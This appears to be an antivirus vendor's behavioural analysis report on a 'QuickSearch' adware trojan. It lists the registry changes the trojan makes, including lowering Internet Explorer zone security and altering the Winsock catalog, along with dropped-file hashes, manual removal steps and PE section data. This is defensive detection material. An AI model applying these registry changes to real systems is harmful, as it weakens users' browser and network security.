[HKCR\CLSID\{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\TypeLib\{029AF757-A988-4BDD-A744-A4C7BCEBB011}\1.0\0\win32]
"(Default)" = "%Program Files%\QuickSearch\zcengine.tlb"
[HKCR\Interface\{389562C4-59D9-40C4-966E-28DA91725FFE}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataController\CLSID]
"(Default)" = "{89E46EA6-2F87-4D79-8FFA-8B264F93F54A}"
[HKCR\Interface\{3F8D3B31-AEB8-4ED7-8B05-5556068D6B54}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{F2FB003D-07C7-4E4D-80E3-00B49468A6F4}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\zcengineLib.DataTable]
"(Default)" = "DataTable Class"
[HKCR\zcengineLib.DataTableHolder.1]
"(Default)" = "DataTableHolder Class"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}]
"(Default)" = "IDataController"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}]
"AppID" = "{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}]
"(Default)" = "ReadOnlyManager Class"
[HKCR\zcengineLib.DataController.1]
"(Default)" = "DataController Class"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{83E07061-02D1-41EC-8751-BB176B823C38}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{34EBA76A-E745-4B18-96C9-2B8E2BA8B246}\TypeLib]
"(Default)" = "{029AF757-A988-4BDD-A744-A4C7BCEBB011}"
[HKCR\Interface\{9F0948E7-227A-4F1B-9849-2D8912F185A7}]
"(Default)" = "ILSPLogic"
[HKCR\Interface\{A471A4AA-5C18-429F-81BF-6C760941DB74}]
"(Default)" = "IDataTableHolder"
[HKCR\zcengineLib.WFPController\CurVer]
"(Default)" = "zcengineLib.WFPController.1"
[HKCR\CLSID\{F811C371-1DC7-4E2F-8676-D96B85BE4AF1}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataTable"
[HKCR\CLSID\{F1BC674D-15D8-46C5-AC51-12AB16D67616}\VersionIndependentProgID]
"(Default)" = "zcengineLib.ReadOnlyManager"
[HKCR\CLSID\{6D5AF218-5F7E-40E0-B49D-54FFAFE2001A}\VersionIndependentProgID]
"(Default)" = "zcengineLib.DataTableFields"
The Trojan deletes the following value(s) in system registry:
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"KomodiaParameters1"
[HKLM\System\CurrentControlSet\Services\zcengine]
"NoCom"
[HKCR\AppID\{9F2949D6-977B-4B61-B513-0C2EE52C2B4F}]
"LocalService"
The process sc.exe:536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 04 82 B7 92 63 72 C6 41 24 8E 6A 3F 4B A8 75"
The process sc.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 45 47 BC DE 32 84 8E FB 3F 1E E5 FC 79 BE B6"
The process poz.exe:2584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 7E C3 76 49 73 55 48 04 75 5A D8 1A 20 8B 77"
The process SchTasks.exe:2660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E9 A0 99 A4 C8 B0 66 DE A3 AB C4 68 A9 81 FF"
The process %original file name%.exe:944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 5E B5 93 5A 0B 89 BE 37 1D 3E 1E 66 D4 90 B2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process setupfs_1123.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\QuickSearch\Components]
"Main" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\nsProcess.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\QuickSearch]
"ver" = "3.0.1.6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\QuickSearch]
"Path" = "%Program Files%\QuickSearch"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\QuickSearch]
"affid" = "1123"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 14 18 EC A8 35 42 F0 AA AD 94 1B D9 C0 05 77"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\QuickSearch]
"UID" = "75ED9567AA584C8EA8EA3CAD7C47AB03"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process zengine.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 31 90 BE D7 17 48 A3 88 C4 CD 54 6A C5 49 D4"
The process zengine.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA B4 90 46 CB 76 80 2E D4 D2 4C 4A D6 96 05 14"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"PackedCatalogItem" = "43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Num_Catalog_Entries" = "14"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "12"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"PackedCatalogItem" = "43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"PackedCatalogItem" = "43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1021"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000C]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000B]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000E]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000000D]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
Dropped PE files
| MD5 | File path |
|---|---|
| 05450face243b3a7472407b999b03a72 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\nsProcess.dll |
| 227edfeeac94d640320bab9ba86c0196 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\setupfs_4435[1].exe |
| f4ce39b055fd011a17f71d09baef2ef8 | c:\Program Files\QuickSearch\AZDLL.dll |
| cff77090b485bb16093678614b578820 | c:\Program Files\QuickSearch\AZDLL64.dll |
| f32ab5cb40ff403b0576ffc9cae61caf | c:\Program Files\QuickSearch\AZDLL64.exe |
| 87ec6937769621f29736e4358077c8cd | c:\Program Files\QuickSearch\freebl3.dll |
| 74485152d7f2c06fe413f48c7da4ff33 | c:\Program Files\QuickSearch\libnspr4.dll |
| 08bacf2967fd8ea468c69f6e8d31b914 | c:\Program Files\QuickSearch\libplc4.dll |
| 56c1c79274ef5728b1f50986a5a8f22e | c:\Program Files\QuickSearch\libplds4.dll |
| 9721a913f9a997a62c532d72ed3e7b8d | c:\Program Files\QuickSearch\nss3.dll |
| ba406d87af2f892c1b59628899fbcb10 | c:\Program Files\QuickSearch\nssckbi.dll |
| 56c619b8135d1fbe8386800020fe7696 | c:\Program Files\QuickSearch\nssdbm3.dll |
| 08b59a1793e8cd6fb085271650f8b5d0 | c:\Program Files\QuickSearch\nssutil3.dll |
| 8d03b10f0dced524a88a3ff4b370f50d | c:\Program Files\QuickSearch\slite.exe |
| 88f553be556ae62c59b3a3fbea81987e | c:\Program Files\QuickSearch\smime3.dll |
| 5ecb1c6033d08a9277df748f6272d6a2 | c:\Program Files\QuickSearch\softokn3.dll |
| 6cba9fe251b78db6ae8c46f851244141 | c:\Program Files\QuickSearch\spw3016.exe |
| 18a54a743d683a0dc40c65155d108608 | c:\Program Files\QuickSearch\sqlite3.dll |
| bf203215a99a7b24f0481003e91ffa65 | c:\Program Files\QuickSearch\ssl3.dll |
| 8de2f3879c867dbfde7780d5b849c223 | c:\Program Files\QuickSearch\uninstall.exe |
| 1894e3fb9c90fa3a238076f28839eadd | c:\Program Files\QuickSearch\zcengine.dll |
| 7bf0de4c88daf2dbbb99d26cba6e0042 | c:\Program Files\QuickSearch\zcengine.exe |
| f539a593f3a793b659f84236b7ac14c7 | c:\Program Files\QuickSearch\zcengine64.dll |
| f10d05a6264e55443a96b311f2da003d | c:\Program Files\QuickSearch\zcenginecert.dll |
| a187767d9b561e9864ebd0faec8e1eac | c:\Program Files\QuickSearch\zcinstaller.exe |
| 04dfc579947f4b98944d0c117bed393f | c:\Program Files\QuickSearch\zcwfp.sys |
| 69dc57b6a37a50328c8980cc5021d7dc | c:\Program Files\QuickSearch\zcwfp64.sys |
| 39adb8287d5ca0ae1059b9665624af43 | c:\Program Files\QuickSearch\zengine.exe |
| dd45f06354ebd07fda123cf0c880e91e | c:\Program Files\QuickSearch\zengine64.exe |
| 1894e3fb9c90fa3a238076f28839eadd | c:\WINDOWS\system32\zcengine.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
zcengine.exe:1284
zcengine.exe:1208
zcengine.exe:684
sc.exe:536
sc.exe:1632
poz.exe:2584
SchTasks.exe:2660
%original file name%.exe:944
setupfs_1123.exe:1940
zengine.exe:2036
zengine.exe:1968 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\zcengine.log (434 bytes)
%WinDir%\Temp\zcengine.log (83902 bytes)
%WinDir%\Temp\CertsIE.dat (12284 bytes)
%System%\zcengineOff.ini (784 bytes)
%System%\zcengine.ini (872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\setupfs_1123.exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\setupfs_4435[1].exe (332214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8JMRO554\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\UAC.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01M9AVQ1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SVMBSZ6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy2.tmp\ns3.tmp (6 bytes)
%Program Files%\QuickSearch\zcinstaller.exe (5896 bytes)
%Program Files%\QuickSearch\uninstall.exe (1793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsE.tmp (6 bytes)
%Program Files%\QuickSearch\AZDLL64.exe (3704 bytes)
%Program Files%\QuickSearch\zcengine.dll (9984 bytes)
%Program Files%\QuickSearch\zcwfp64.sys (1552 bytes)
%Program Files%\QuickSearch\spw3016.exe (1856 bytes)
%Program Files%\QuickSearch\slite.exe (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\GetVersion.dll (6 bytes)
%Program Files%\QuickSearch\nssutil3.dll (5064 bytes)
%Program Files%\QuickSearch\ssl3.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns8.tmp (6 bytes)
%Program Files%\QuickSearch\out.txt (52 bytes)
%Program Files%\QuickSearch\libnspr4.dll (11048 bytes)
C:\END (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsC.tmp (6 bytes)
%Program Files%\QuickSearch\libplds4.dll (1552 bytes)
%Program Files%\QuickSearch\softokn3.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
%Program Files%\QuickSearch\poz.exe (4080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\pwgen.dll (784 bytes)
%Program Files%\QuickSearch\zcengine64.dll (11728 bytes)
%Program Files%\QuickSearch\zengine64.exe (9664 bytes)
%Program Files%\QuickSearch\zcwfp.sys (1552 bytes)
%Program Files%\QuickSearch\zengine.ini (116 bytes)
%Program Files%\QuickSearch\nssckbi.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsD.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.tlb (1856 bytes)
%Program Files%\QuickSearch\zengine.exe (17395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsExec.dll (6 bytes)
%Program Files%\QuickSearch\freebl3.dll (11152 bytes)
%Program Files%\QuickSearch\smime3.dll (5064 bytes)
%Program Files%\QuickSearch\AZDLL64.dll (5184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (235157 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsProcess.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsA.tmp (6 bytes)
%Program Files%\QuickSearch\libplc4.dll (1552 bytes)
%Program Files%\QuickSearch\zcenginecert.dll (6056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\I9SFMNGD\ext[1].htm (2 bytes)
%Program Files%\QuickSearch\sqlite3.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ns9.tmp (6 bytes)
%Program Files%\QuickSearch\nss3.dll (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsB.tmp (6 bytes)
%Program Files%\QuickSearch\zcengine.exe (72529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Program Files%\QuickSearch\nssdbm3.dll (6360 bytes)
%Program Files%\QuickSearch\AZDLL.dll (3744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lengine.ini.log (895 bytes)
%System%\zcengine.dll (1281 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
| .rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
| .data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
| .ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 233472 | 2528 | 2560 | 3.12457 | af5f0ea142ea650416afc03d4547aebc |
Dropped from:
3117f416905582f23f49d25c1be8c5a6
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 23
8c788790039d11a28836711e355ba31e
5b0d5015e3c9a03e64c30c14d6708e1a
c437f1ccca1a26838185203812fc7e40
17fac347497d4b7fdd2d1e5a7ed819d1
00e1fb6179a9f410ee536197ea6d226f
b5d995c48e9978cdd729b465ad2fb685
3246158dce46d9aac1908157cf6da56f
ca7e3b01164d376114b1f6a73915a743
4fe0909222050513238c67bd5fe51e93
